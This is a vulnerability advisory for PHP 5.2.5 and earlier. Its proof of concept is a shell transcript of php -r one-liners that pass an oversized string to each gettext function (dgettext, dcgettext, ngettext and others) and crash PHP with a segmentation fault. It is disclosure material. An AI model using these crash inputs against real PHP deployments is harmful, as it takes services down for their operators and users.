Application: PHP <= 5.2.5

Web Site: http://php.net

Platform: Unix

Bug: Multiple Denial of service

fonction: Gettext Lib multiple Denial of service

special condition: Default php-memory-limit

Tested on : Debian 4.0 , Ubuntu , Freebsd with Suhosin 0.9.6.2

-------------------------------------------------------

1) Introduction

2) Bug

3) Proof of concept

4) Greets

5) Credits

===========

1) Introduction

===========

"PHP is a widely-used general-purpose scripting language that

is especially suited for Web development and can be embedded into HTML."

======

2) Bug

======

dgettext(),dcgettext(),dngettext(),gettext(),ngettext(),dcgettext() are vulnerable to a Denial of service

=====

3)Proof of concept

=====

Proof of concept example :

root@unsafebox:/# uname -a

Linux unsafebox 2.6.20-16-generic #2 SMP Sun Sep 23 19:50:39 UTC 2007 i686 GNU/Linux

root@unsafebox:/# php -v

PHP 5.2.5 (cli) (built: Nov 11 2007 07:56:04)

Copyright (c) 1997-2007 The PHP Group

Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies

root@unsafebox:/# php -r 'dgettext(str_repeat("A",8476509),"hi");'

Erreur de segmentation (core dumped)

root@unsafebox:/# php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");'

Erreur de segmentation (core dumped)

root@unsafebox:/# php -r 'dngettext("hi",str_repeat("A",8476509),"hi",-1);'

Erreur de segmentation (core dumped)

root@unsafebox:/# php -r 'gettext(str_repeat("A",8476509));'

Erreur de segmentation (core dumped)

root@unsafebox:/# php -r 'ngettext(str_repeat("A",8476509),"hi",-1);'

Erreur de segmentation (core dumped)

root@unsafebox:/# php -r 'dcgettext(LC_CTYPE,str_repeat("A",8476509),"hi");'

Erreur de segmentation (core dumped)

========

4)Greets

========

Benjilenoob,team soh, #futurezone, #soh

=====

5)Credits

=====

laurent gaffié

[ reply ]